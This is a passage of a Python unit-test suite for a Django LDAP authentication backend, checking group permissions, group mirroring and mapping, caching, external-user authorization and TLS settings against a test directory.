        backend.get_group_permissions(alice), {"auth.add_group", "auth.delete_user"}
    )
    self.assertEqual(
        backend.get_all_permissions(alice), {"auth.add_group", "auth.delete_user"}
    )
    self.assertIs(backend.has_perm(alice, "auth.add_group"), True)
    self.assertIs(backend.has_module_perms(alice, "auth"), True)
def test_group_permissions_ldap_error(self):
    """A failed bind (bogus password) yields an empty permission set."""
    self._init_settings(
        BIND_DN="uid=bob,ou=people,o=test",
        BIND_PASSWORD="bogus",  # deliberately wrong to trigger the LDAP error
        USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
        GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
        GROUP_TYPE=MemberDNGroupType(member_attr="member"),
        FIND_GROUP_PERMS=True,
    )
    self._init_groups()
    backend = get_backend()
    alice = User.objects.create(username="alice")
    alice = backend.get_user(alice.pk)
    self.assertEqual(backend.get_group_permissions(alice), set())
def test_mapping_group_permissions_ldap_error(self):
    """A failed bind yields an empty permission set with USE_GROUP_MAPPING too."""
    self._init_settings(
        BIND_DN="uid=bob,ou=people,o=test",
        BIND_PASSWORD="bogus",  # deliberately wrong to trigger the LDAP error
        USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
        GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
        GROUP_TYPE=MemberDNGroupType(member_attr="member"),
        FIND_GROUP_PERMS=True,
        USE_GROUP_MAPPING=True
    )
    self._init_groups_with_mapping()
    backend = get_backend()
    alice = User.objects.create(username="alice")
    alice = backend.get_user(alice.pk)
    self.assertEqual(backend.get_group_permissions(alice), set())
def test_empty_group_permissions(self):
    """A user in no permission-bearing LDAP groups gets no permissions."""
    self._init_settings(
        USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
        GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
        GROUP_TYPE=MemberDNGroupType(member_attr="member"),
        FIND_GROUP_PERMS=True,
    )
    self._init_groups()
    backend = get_backend()
    bob = User.objects.create(username="bob")
    bob = backend.get_user(bob.pk)
    self.assertEqual(backend.get_group_permissions(bob), set())
    self.assertEqual(backend.get_all_permissions(bob), set())
    self.assertIs(backend.has_perm(bob, "auth.add_user"), False)
    self.assertIs(backend.has_module_perms(bob, "auth"), False)
def test_mapping_empty_group_permissions(self):
    """No matching mapped groups means no permissions under USE_GROUP_MAPPING."""
    self._init_settings(
        USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
        GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
        GROUP_TYPE=MemberDNGroupType(member_attr="member"),
        FIND_GROUP_PERMS=True,
        USE_GROUP_MAPPING=True
    )
    self._init_groups_with_mapping()
    backend = get_backend()
    bob = User.objects.create(username="bob")
    bob = backend.get_user(bob.pk)
    self.assertEqual(backend.get_group_permissions(bob), set())
    self.assertEqual(backend.get_all_permissions(bob), set())
    self.assertIs(backend.has_perm(bob, "auth.add_group"), False)
    self.assertIs(backend.has_module_perms(bob, "auth"), False)
def test_posix_group_permissions(self):
    """Group permissions resolve through a posixGroup-filtered search."""
    self._init_settings(
        USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
        GROUP_SEARCH=LDAPSearch(
            "ou=groups,o=test", ldap.SCOPE_SUBTREE, "(objectClass=posixGroup)"
        ),
        GROUP_TYPE=PosixGroupType(),
        FIND_GROUP_PERMS=True,
    )
    self._init_groups()
    backend = get_backend()
    alice = User.objects.create(username="alice")
    alice = backend.get_user(alice.pk)
    self.assertEqual(
        backend.get_group_permissions(alice), {"auth.add_user", "auth.change_user"}
    )
    self.assertEqual(
        backend.get_all_permissions(alice), {"auth.add_user", "auth.change_user"}
    )
    self.assertIs(backend.has_perm(alice, "auth.add_user"), True)
    self.assertIs(backend.has_module_perms(alice, "auth"), True)
def test_mapping_posix_group_permissions(self):
    """Posix group permissions resolve through GroupMapping entries."""
    self._init_settings(
        USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
        GROUP_SEARCH=LDAPSearch(
            "ou=groups,o=test", ldap.SCOPE_SUBTREE, "(objectClass=posixGroup)"
        ),
        GROUP_TYPE=PosixGroupType(),
        FIND_GROUP_PERMS=True,
        USE_GROUP_MAPPING=True,
    )
    self._init_groups_with_mapping()
    backend = get_backend()
    alice = User.objects.create(username="alice")
    alice = backend.get_user(alice.pk)
    self.assertEqual(
        backend.get_group_permissions(alice), {"auth.add_group", "auth.delete_user"}
    )
    self.assertEqual(
        backend.get_all_permissions(alice), {"auth.add_group", "auth.delete_user"}
    )
    self.assertIs(backend.has_perm(alice, "auth.add_group"), True)
    self.assertIs(backend.has_module_perms(alice, "auth"), True)
def test_posix_group_permissions_no_gid(self):
    """A user without a gidNumber still gets posix group permissions."""
    self._init_settings(
        USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
        GROUP_SEARCH=LDAPSearch(
            "ou=groups,o=test", ldap.SCOPE_SUBTREE, "(objectClass=posixGroup)"
        ),
        GROUP_TYPE=PosixGroupType(),
        FIND_GROUP_PERMS=True,
    )
    self._init_groups()
    backend = get_backend()
    nonposix = User.objects.create(username="nonposix")
    nonposix = backend.get_user(nonposix.pk)
    self.assertEqual(
        backend.get_group_permissions(nonposix),
        {"auth.add_user", "auth.change_user"},
    )
    self.assertEqual(
        backend.get_all_permissions(nonposix), {"auth.add_user", "auth.change_user"}
    )
    self.assertIs(backend.has_perm(nonposix, "auth.add_user"), True)
    self.assertIs(backend.has_module_perms(nonposix, "auth"), True)
def test_mapping_posix_group_permissions_no_gid(self):
    """A gidNumber-less user gets mapped posix group permissions too."""
    self._init_settings(
        USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
        GROUP_SEARCH=LDAPSearch(
            "ou=groups,o=test", ldap.SCOPE_SUBTREE, "(objectClass=posixGroup)"
        ),
        GROUP_TYPE=PosixGroupType(),
        FIND_GROUP_PERMS=True,
        USE_GROUP_MAPPING=True,
    )
    self._init_groups_with_mapping()
    backend = get_backend()
    nonposix = User.objects.create(username="nonposix")
    nonposix = backend.get_user(nonposix.pk)
    self.assertEqual(
        backend.get_group_permissions(nonposix),
        {"auth.add_group", "auth.delete_user"},
    )
    self.assertEqual(
        backend.get_all_permissions(nonposix), {"auth.add_group", "auth.delete_user"}
    )
    self.assertIs(backend.has_perm(nonposix, "auth.delete_user"), True)
    self.assertIs(backend.has_module_perms(nonposix, "auth"), True)
def test_foreign_user_permissions(self):
    """A plain Django user (never loaded via the backend) gets no LDAP perms."""
    self._init_settings(
        USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
        GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
        GROUP_TYPE=MemberDNGroupType(member_attr="member"),
        FIND_GROUP_PERMS=True,
    )
    self._init_groups()
    backend = get_backend()
    # Note: alice is NOT refetched via backend.get_user here.
    alice = User.objects.create(username="alice")
    self.assertEqual(backend.get_group_permissions(alice), set())
def test_mapping_foreign_user_permissions(self):
    """A non-backend user gets no LDAP perms under USE_GROUP_MAPPING either."""
    self._init_settings(
        USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
        GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
        GROUP_TYPE=MemberDNGroupType(member_attr="member"),
        FIND_GROUP_PERMS=True,
        USE_GROUP_MAPPING=True,
    )
    self._init_groups_with_mapping()
    backend = get_backend()
    # Note: alice is NOT refetched via backend.get_user here.
    alice = User.objects.create(username="alice")
    self.assertEqual(backend.get_group_permissions(alice), set())
@spy_ldap("search_s")
def test_group_cache(self, mock):
    """With CACHE_TIMEOUT set, group searches are cached per user.

    Permissions are checked twice per user, but only one search_s call per
    user should reach LDAP.
    """
    self._init_settings(
        USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
        GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
        GROUP_TYPE=MemberDNGroupType(member_attr="member"),
        FIND_GROUP_PERMS=True,
        CACHE_TIMEOUT=3600,
    )
    self._init_groups()
    backend = get_backend()
    alice_id = User.objects.create(username="alice").pk
    bob_id = User.objects.create(username="bob").pk
    # Check permissions twice for each user; the second pass must hit the cache.
    for _ in range(2):  # index unused; matches the `for _` idiom used elsewhere
        alice = backend.get_user(alice_id)
        self.assertEqual(
            backend.get_group_permissions(alice),
            {"auth.add_user", "auth.change_user"},
        )
        bob = backend.get_user(bob_id)
        self.assertEqual(backend.get_group_permissions(bob), set())
    # Should have executed one LDAP search per user
    self.assertEqual(mock.call_count, 2)
@spy_ldap("search_s")
def test_mapping_group_cache(self, mock):
    """Group-search caching also works when USE_GROUP_MAPPING is enabled.

    Permissions are checked twice per user, but only one search_s call per
    user should reach LDAP.
    """
    self._init_settings(
        USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
        GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
        GROUP_TYPE=MemberDNGroupType(member_attr="member"),
        FIND_GROUP_PERMS=True,
        CACHE_TIMEOUT=3600,
        USE_GROUP_MAPPING=True,
    )
    self._init_groups_with_mapping()
    backend = get_backend()
    alice_id = User.objects.create(username="alice").pk
    bob_id = User.objects.create(username="bob").pk
    # Check permissions twice for each user; the second pass must hit the cache.
    for _ in range(2):  # index unused; matches the `for _` idiom used elsewhere
        alice = backend.get_user(alice_id)
        self.assertEqual(
            backend.get_group_permissions(alice),
            {"auth.add_group", "auth.delete_user"},
        )
        bob = backend.get_user(bob_id)
        self.assertEqual(backend.get_group_permissions(bob), set())
    # Should have executed one LDAP search per user
    self.assertEqual(mock.call_count, 2)
def test_group_mirroring(self):
    """MIRROR_GROUPS creates Django groups from LDAP and assigns the user."""
    self._init_settings(
        USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
        GROUP_SEARCH=LDAPSearch(
            "ou=groups,o=test", ldap.SCOPE_SUBTREE, "(objectClass=posixGroup)"
        ),
        GROUP_TYPE=PosixGroupType(),
        MIRROR_GROUPS=True,
    )
    self.assertEqual(Group.objects.count(), 0)
    alice = authenticate(username="alice", password="password")
    # Mirroring created three groups and put alice in all of them.
    self.assertEqual(Group.objects.count(), 3)
    self.assertEqual(set(alice.groups.all()), set(Group.objects.all()))
def test_mapping_group_mirroring_empty_mapping(self):
    """With USE_GROUP_MAPPING and no mappings, mirroring creates nothing."""
    self._init_settings(
        USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
        GROUP_SEARCH=LDAPSearch(
            "ou=groups,o=test", ldap.SCOPE_SUBTREE, "(objectClass=posixGroup)"
        ),
        GROUP_TYPE=PosixGroupType(),
        MIRROR_GROUPS=True,
        USE_GROUP_MAPPING=True,
    )
    self.assertEqual(Group.objects.count(), 0)
    alice = authenticate(username="alice", password="password")
    # No GroupMapping rows exist, so no groups are created or assigned.
    self.assertEqual(Group.objects.count(), 0)
    self.assertEqual(alice.groups.count(), 0)
def test_mapping_group_mirroring_nonempty_mapping(self):
    """Mirroring with mappings assigns only the mapped Django groups."""
    self._init_settings(
        USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
        GROUP_SEARCH=LDAPSearch(
            "ou=groups,o=test", ldap.SCOPE_SUBTREE, "(objectClass=posixGroup)"
        ),
        GROUP_TYPE=PosixGroupType(),
        MIRROR_GROUPS=True,
        USE_GROUP_MAPPING=True,
    )
    self.assertEqual(Group.objects.count(), 0)
    # Map two Django groups to alice's LDAP posix groups; one group is unmapped.
    for django_name, ldap_name in [
        ("django_active_px", "active_px"),
        ("django_staff_px", "staff_px"),
    ]:
        GroupMapping.objects.create(
            django_group=Group.objects.create(name=django_name),
            ldap_group_name=ldap_name,
        )
    Group.objects.create(name="non-ldap-group")
    alice = authenticate(username="alice", password="password")
    self.assertEqual(alice.groups.count(), 2)
    self.assertEqual(
        set(alice.groups.all().values_list("name", flat=True)),
        {"django_active_px", "django_staff_px"}
    )
def test_nested_group_mirroring(self):
    """Mirroring with nested groups creates the full transitive group set."""
    self._init_settings(
        USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
        GROUP_SEARCH=LDAPSearch(
            "ou=groups,o=test", ldap.SCOPE_SUBTREE, "(objectClass=groupOfNames)"
        ),
        GROUP_TYPE=NestedMemberDNGroupType(member_attr="member"),
        MIRROR_GROUPS=True,
    )
    alice = authenticate(username="alice", password="password")
    self.assertEqual(
        set(Group.objects.all().values_list("name", flat=True)),
        {
            "active_gon",
            "staff_gon",
            "superuser_gon",
            "nested_gon",
            "parent_gon",
            "circular_gon",
        },
    )
    self.assertEqual(set(alice.groups.all()), set(Group.objects.all()))
def test_mapping_nested_group_mirroring_empty_mapping(self):
    """Pre-existing Django groups without mappings are never assigned."""
    self._init_settings(
        USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
        GROUP_SEARCH=LDAPSearch(
            "ou=groups,o=test", ldap.SCOPE_SUBTREE, "(objectClass=groupOfNames)"
        ),
        GROUP_TYPE=NestedMemberDNGroupType(member_attr="member"),
        MIRROR_GROUPS=True,
        USE_GROUP_MAPPING=True,
    )
    # Groups exist but no GroupMapping rows link them to LDAP groups.
    Group.objects.create(name="django_active_gon")
    Group.objects.create(name="django_staff_gon")
    alice = authenticate(username="alice", password="password")
    self.assertEqual(
        set(Group.objects.all().values_list("name", flat=True)),
        {"django_active_gon", "django_staff_gon"},
    )
    self.assertEqual(set(alice.groups.all()), set())
def test_mapping_nested_group_mirroring_full_mapping(self):
    """With every nested LDAP group mapped, alice joins all mapped groups."""
    self._init_settings(
        USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
        GROUP_SEARCH=LDAPSearch(
            "ou=groups,o=test", ldap.SCOPE_SUBTREE, "(objectClass=groupOfNames)"
        ),
        GROUP_TYPE=NestedMemberDNGroupType(member_attr="member"),
        MIRROR_GROUPS=True,
        USE_GROUP_MAPPING=True,
    )
    # One Django group and one mapping per LDAP groupOfNames group.
    active = Group.objects.create(name="django_active_gon")
    staff = Group.objects.create(name="django_staff_gon")
    superuser = Group.objects.create(name="django_superuser_gon")
    nested = Group.objects.create(name="django_nested_gon")
    parent = Group.objects.create(name="django_parent_gon")
    circular = Group.objects.create(name="django_circular_gon")
    GroupMapping.objects.create(django_group=active, ldap_group_name="active_gon")
    GroupMapping.objects.create(django_group=staff, ldap_group_name="staff_gon")
    GroupMapping.objects.create(django_group=superuser, ldap_group_name="superuser_gon")
    GroupMapping.objects.create(django_group=nested, ldap_group_name="nested_gon")
    GroupMapping.objects.create(django_group=parent, ldap_group_name="parent_gon")
    GroupMapping.objects.create(django_group=circular, ldap_group_name="circular_gon")
    alice = authenticate(username="alice", password="password")
    self.assertEqual(
        set(Group.objects.all().values_list("name", flat=True)),
        {
            "django_active_gon",
            "django_staff_gon",
            "django_superuser_gon",
            "django_nested_gon",
            "django_parent_gon",
            "django_circular_gon",
        },
    )
    self.assertEqual(set(alice.groups.all()), set(Group.objects.all()))
def test_mapping_nested_group_mirroring_partial_mapping(self):
    """Only mapped groups are assigned; unmapped groups are left untouched."""
    self._init_settings(
        USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
        GROUP_SEARCH=LDAPSearch(
            "ou=groups,o=test", ldap.SCOPE_SUBTREE, "(objectClass=groupOfNames)"
        ),
        GROUP_TYPE=NestedMemberDNGroupType(member_attr="member"),
        MIRROR_GROUPS=True,
        USE_GROUP_MAPPING=True,
    )
    active = Group.objects.create(name="django_active_gon")
    staff = Group.objects.create(name="django_staff_gon")
    # Same name as an LDAP group, but no GroupMapping row -> not assigned.
    not_mapped = Group.objects.create(name="superuser_gon")
    GroupMapping.objects.create(django_group=active, ldap_group_name="active_gon")
    GroupMapping.objects.create(django_group=staff, ldap_group_name="staff_gon")
    alice = authenticate(username="alice", password="password")
    self.assertEqual(
        set(Group.objects.all().values_list("name", flat=True)),
        {
            "django_active_gon",
            "django_staff_gon",
            "superuser_gon",
        },
    )
    self.assertEqual(
        set(alice.groups.all().values_list("name", flat=True)),
        {"django_active_gon", "django_staff_gon"}
    )
# Group mapping forbids use of the group whitelist/blacklist settings. Instead, the
# mapping itself acts as a whitelist, and the Django groups should be created beforehand.
def test_mapping_group_no_group_whitelist(self):
    """A MIRROR_GROUPS whitelist is rejected when USE_GROUP_MAPPING is on."""
    self._init_settings(
        USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
        GROUP_SEARCH=LDAPSearch(
            "ou=mirror_groups,o=test",
            ldap.SCOPE_SUBTREE,
            "(objectClass=groupOfNames)",
        ),
        GROUP_TYPE=GroupOfNamesType(),
        MIRROR_GROUPS=["mirror1", "mirror2"],  # list form is incompatible with mapping
        USE_GROUP_MAPPING=True,
    )
    backend = get_backend()
    with self.assertRaises(ImproperlyConfigured):
        # Return value intentionally discarded; only the raise matters.
        backend.populate_user("alice")
def test_mapping_group_no_group_blacklist(self):
    """MIRROR_GROUPS_EXCEPT is rejected when USE_GROUP_MAPPING is on."""
    self._init_settings(
        USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
        GROUP_SEARCH=LDAPSearch(
            "ou=mirror_groups,o=test",
            ldap.SCOPE_SUBTREE,
            "(objectClass=groupOfNames)",
        ),
        GROUP_TYPE=GroupOfNamesType(),
        MIRROR_GROUPS_EXCEPT=["mirror1", "mirror2"],  # incompatible with mapping
        USE_GROUP_MAPPING=True,
    )
    backend = get_backend()
    with self.assertRaises(ImproperlyConfigured):
        # Return value intentionally discarded; only the raise matters.
        backend.populate_user("alice")
def test_mapping_group_mirroring_whitelist_update(self):
    """Mapped groups are re-synced from LDAP; unmapped memberships persist.

    alice starts in group2/group4/group5; after authenticating, the mapped
    groups (group1-group4) are reset to her LDAP membership (group1, group3)
    while the unmapped group5 is left alone.
    """
    self._init_settings(
        USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
        GROUP_SEARCH=LDAPSearch(
            "ou=mirror_groups,o=test",
            ldap.SCOPE_SUBTREE,
            "(objectClass=groupOfNames)",
        ),
        GROUP_TYPE=GroupOfNamesType(),
        MIRROR_GROUPS=True,
        USE_GROUP_MAPPING=True
    )
    backend = get_backend()
    groups = {}
    # Create mapped groups
    for i in range(1, 5):
        django_name = "group{0}".format(i)
        ldap_name = "mirror{0}".format(i)
        groups[django_name] = Group.objects.create(name=django_name)
        GroupMapping.objects.create(django_group=groups[django_name], ldap_group_name=ldap_name)
    # Create unmapped group
    groups["group5"] = Group.objects.create(name="group5")
    alice = backend.populate_user("alice")
    alice.groups.set([groups["group2"], groups["group4"], groups["group5"]])
    alice = authenticate(username="alice", password="password")
    self.assertEqual(
        set(alice.groups.values_list("name", flat=True)), {"group1", "group3", "group5"}
    )
def test_mapping_group_mirroring_whitelist_noop(self):
    """Membership already matching the mapped LDAP groups is unchanged.

    Only group1 and group3 are mapped; alice already belongs to them, so
    mirroring leaves all of her memberships (including unmapped group4 and
    group5) intact.
    """
    self._init_settings(
        USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
        GROUP_SEARCH=LDAPSearch(
            "ou=mirror_groups,o=test",
            ldap.SCOPE_SUBTREE,
            "(objectClass=groupOfNames)",
        ),
        GROUP_TYPE=GroupOfNamesType(),
        MIRROR_GROUPS=True,
        USE_GROUP_MAPPING=True
    )
    backend = get_backend()
    groups = {}
    # Create mapped groups
    for i in range(1, 5):
        django_name = "group{0}".format(i)
        ldap_name = "mirror{0}".format(i)
        groups[django_name] = Group.objects.create(name=django_name)
        if i in (1, 3):
            GroupMapping.objects.create(django_group=groups[django_name], ldap_group_name=ldap_name)
    # Create unmapped group
    groups["group5"] = Group.objects.create(name="group5")
    alice = backend.populate_user("alice")
    alice.groups.set([groups["group1"], groups["group3"], groups["group4"], groups["group5"]])
    alice = authenticate(username="alice", password="password")
    self.assertEqual(
        set(alice.groups.values_list("name", flat=True)), {"group1", "group3", "group4", "group5"}
    )
#
# When selectively mirroring groups, there are eight scenarios for any
# given user/group pair:
#
# (is-member-in-LDAP, not-member-in-LDAP)
# x (is-member-in-Django, not-member-in-Django)
# x (synced, not-synced)
#
# The four test cases below take these scenarios four at a time for each of
# the two settings.
def test_group_mirroring_whitelist_update(self):
    """Whitelisted groups sync to LDAP; others keep their prior membership."""
    self._init_settings(
        USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
        GROUP_SEARCH=LDAPSearch(
            "ou=mirror_groups,o=test",
            ldap.SCOPE_SUBTREE,
            "(objectClass=groupOfNames)",
        ),
        GROUP_TYPE=GroupOfNamesType(),
        MIRROR_GROUPS=["mirror1", "mirror2"],
    )
    backend = get_backend()
    groups = {}
    for name in ("mirror{}".format(i) for i in range(1, 5)):
        groups[name] = Group.objects.create(name=name)
    alice = backend.populate_user("alice")
    # Start alice in one whitelisted (mirror2) and one unsynced (mirror4) group.
    alice.groups.set([groups["mirror2"], groups["mirror4"]])
    alice = authenticate(username="alice", password="password")
    self.assertEqual(
        set(alice.groups.values_list("name", flat=True)), {"mirror1", "mirror4"}
    )
def test_group_mirroring_whitelist_noop(self):
    """Already-correct whitelist membership is left untouched by mirroring."""
    self._init_settings(
        USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
        GROUP_SEARCH=LDAPSearch(
            "ou=mirror_groups,o=test",
            ldap.SCOPE_SUBTREE,
            "(objectClass=groupOfNames)",
        ),
        GROUP_TYPE=GroupOfNamesType(),
        MIRROR_GROUPS=["mirror1", "mirror2"],
    )
    backend = get_backend()
    groups = {}
    for name in ("mirror{}".format(i) for i in range(1, 5)):
        groups[name] = Group.objects.create(name=name)
    alice = backend.populate_user("alice")
    alice.groups.set([groups["mirror1"], groups["mirror3"]])
    alice = authenticate(username="alice", password="password")
    self.assertEqual(
        set(alice.groups.values_list("name", flat=True)), {"mirror1", "mirror3"}
    )
def test_group_mirroring_blacklist_update(self):
    """Non-blacklisted groups sync to LDAP; blacklisted ones are untouched."""
    self._init_settings(
        USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
        GROUP_SEARCH=LDAPSearch(
            "ou=mirror_groups,o=test",
            ldap.SCOPE_SUBTREE,
            "(objectClass=groupOfNames)",
        ),
        GROUP_TYPE=GroupOfNamesType(),
        MIRROR_GROUPS_EXCEPT=["mirror1", "mirror2"],
    )
    backend = get_backend()
    groups = {}
    for name in ("mirror{}".format(i) for i in range(1, 5)):
        groups[name] = Group.objects.create(name=name)
    alice = backend.populate_user("alice")
    # mirror2 is blacklisted (kept as-is); mirror4 gets re-synced from LDAP.
    alice.groups.set([groups["mirror2"], groups["mirror4"]])
    alice = authenticate(username="alice", password="password")
    self.assertEqual(
        set(alice.groups.values_list("name", flat=True)), {"mirror2", "mirror3"}
    )
def test_group_mirroring_blacklist_noop(self):
    """Already-correct membership under a blacklist is left untouched."""
    self._init_settings(
        USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
        GROUP_SEARCH=LDAPSearch(
            "ou=mirror_groups,o=test",
            ldap.SCOPE_SUBTREE,
            "(objectClass=groupOfNames)",
        ),
        GROUP_TYPE=GroupOfNamesType(),
        MIRROR_GROUPS_EXCEPT=["mirror1", "mirror2"],
    )
    backend = get_backend()
    groups = {}
    for name in ("mirror{}".format(i) for i in range(1, 5)):
        groups[name] = Group.objects.create(name=name)
    alice = backend.populate_user("alice")
    alice.groups.set([groups["mirror1"], groups["mirror3"]])
    alice = authenticate(username="alice", password="password")
    self.assertEqual(
        set(alice.groups.values_list("name", flat=True)), {"mirror1", "mirror3"}
    )
def test_authorize_external_users(self):
    """AUTHORIZE_ALL_USERS grants LDAP perms to users not loaded via backend."""
    self._init_settings(
        USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
        GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
        GROUP_TYPE=MemberDNGroupType(member_attr="member"),
        FIND_GROUP_PERMS=True,
        AUTHORIZE_ALL_USERS=True,
    )
    self._init_groups()
    backend = get_backend()
    alice = User.objects.create(username="alice")
    self.assertEqual(
        backend.get_group_permissions(alice), {"auth.add_user", "auth.change_user"}
    )
def test_mapping_authorize_external_users(self):
    """AUTHORIZE_ALL_USERS works together with USE_GROUP_MAPPING."""
    self._init_settings(
        USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
        GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
        GROUP_TYPE=MemberDNGroupType(member_attr="member"),
        FIND_GROUP_PERMS=True,
        AUTHORIZE_ALL_USERS=True,
        USE_GROUP_MAPPING=True
    )
    self._init_groups_with_mapping()
    backend = get_backend()
    alice = User.objects.create(username="alice")
    self.assertEqual(
        backend.get_group_permissions(alice), {"auth.add_group", "auth.delete_user"}
    )
def test_authorize_external_unknown(self):
    """A username absent from LDAP gets no perms even with AUTHORIZE_ALL_USERS."""
    self._init_settings(
        USER_SEARCH=LDAPSearch(
            "ou=people,o=test", ldap.SCOPE_SUBTREE, "(uid=%(user)s)"
        ),
        GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
        GROUP_TYPE=MemberDNGroupType(member_attr="member"),
        FIND_GROUP_PERMS=True,
        AUTHORIZE_ALL_USERS=True,
    )
    self._init_groups()
    backend = get_backend()
    alice = User.objects.create(username="not-in-ldap")
    self.assertEqual(backend.get_group_permissions(alice), set())
def test_mapping_authorize_external_unknown(self):
    """An unknown LDAP username gets no perms under USE_GROUP_MAPPING either."""
    self._init_settings(
        USER_SEARCH=LDAPSearch(
            "ou=people,o=test", ldap.SCOPE_SUBTREE, "(uid=%(user)s)"
        ),
        GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
        GROUP_TYPE=MemberDNGroupType(member_attr="member"),
        FIND_GROUP_PERMS=True,
        AUTHORIZE_ALL_USERS=True,
        USE_GROUP_MAPPING=True,
    )
    self._init_groups_with_mapping()
    backend = get_backend()
    alice = User.objects.create(username="not-in-ldap")
    self.assertEqual(backend.get_group_permissions(alice), set())
def test_create_without_auth(self):
    """populate_user creates users with default fields and flags, no auth."""
    self._init_settings(USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test")
    backend = get_backend()
    alice = backend.populate_user("alice")
    bob = backend.populate_user("bob")
    # No USER_ATTR_MAP is configured, so names stay empty.
    self.assertIsNotNone(alice)
    self.assertEqual(alice.first_name, "")
    self.assertEqual(alice.last_name, "")
    self.assertIs(alice.is_active, True)
    self.assertIs(alice.is_staff, False)
    self.assertIs(alice.is_superuser, False)
    self.assertIsNotNone(bob)
    self.assertEqual(bob.first_name, "")
    self.assertEqual(bob.last_name, "")
    self.assertIs(bob.is_active, True)
    self.assertIs(bob.is_staff, False)
    self.assertIs(bob.is_superuser, False)
def test_populate_without_auth(self):
    """populate_user fills attrs and flags even with ALWAYS_UPDATE_USER off."""
    self._init_settings(
        USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
        ALWAYS_UPDATE_USER=False,
        USER_ATTR_MAP={"first_name": "givenName", "last_name": "sn"},
        GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
        GROUP_TYPE=GroupOfNamesType(),
        USER_FLAGS_BY_GROUP={
            "is_active": "cn=active_gon,ou=groups,o=test",
            "is_staff": "cn=staff_gon,ou=groups,o=test",
            "is_superuser": "cn=superuser_gon,ou=groups,o=test",
        },
    )
    # Users already exist in Django before being populated from LDAP.
    User.objects.create(username="alice")
    User.objects.create(username="bob")
    backend = get_backend()
    alice = backend.populate_user("alice")
    bob = backend.populate_user("bob")
    self.assertIsNotNone(alice)
    self.assertEqual(alice.first_name, "Alice")
    self.assertEqual(alice.last_name, "Adams")
    self.assertIs(alice.is_active, True)
    self.assertIs(alice.is_staff, True)
    self.assertIs(alice.is_superuser, True)
    self.assertIsNotNone(bob)
    self.assertEqual(bob.first_name, "Robert")
    self.assertEqual(bob.last_name, "Barker")
    self.assertIs(bob.is_active, False)
    self.assertIs(bob.is_staff, False)
    self.assertIs(bob.is_superuser, False)
def test_populate_bogus_user(self):
    """populate_user returns None for a username not present in LDAP."""
    self._init_settings(USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test")
    backend = get_backend()
    bogus = backend.populate_user("bogus")
    self.assertIsNone(bogus)
@spy_ldap("start_tls_s")
def test_start_tls_missing(self, mock):
    """start_tls_s is not called when START_TLS is False."""
    self._init_settings(
        USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test", START_TLS=False
    )
    authenticate(username="alice", password="password")
    mock.assert_not_called()
@spy_ldap("start_tls_s")
def test_start_tls(self, mock):
    """start_tls_s is called exactly once when START_TLS is True."""
    self._init_settings(
        USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test", START_TLS=True
    )
    authenticate(username="alice", password="password")
    mock.assert_called_once()
def test_null_search_results(self):
    """
    Make sure we're not fazed by referrals.
    """
    self._init_settings(
        USER_SEARCH=LDAPSearch(
            "ou=people,o=test", ldap.SCOPE_SUBTREE, "(uid=%(user)s)"
        )
    )
    # Passes as long as authentication does not blow up on referral entries.
    authenticate(username="alice", password="password")
def test_union_search(self):
    """LDAPSearchUnion finds the user even when the first search misses."""
    self._init_settings(
        USER_SEARCH=LDAPSearchUnion(
            # First branch searches the wrong ou; the second matches alice.
            LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE, "(uid=%(user)s)"),
            LDAPSearch("ou=people,o=test", ldap.SCOPE_SUBTREE, "(uid=%(user)s)"),
        )
    )
    alice = authenticate(username="alice", password="password")
    self.assertIsNotNone(alice)
@spy_ldap("simple_bind_s")
def test_deny_empty_password(self, mock):
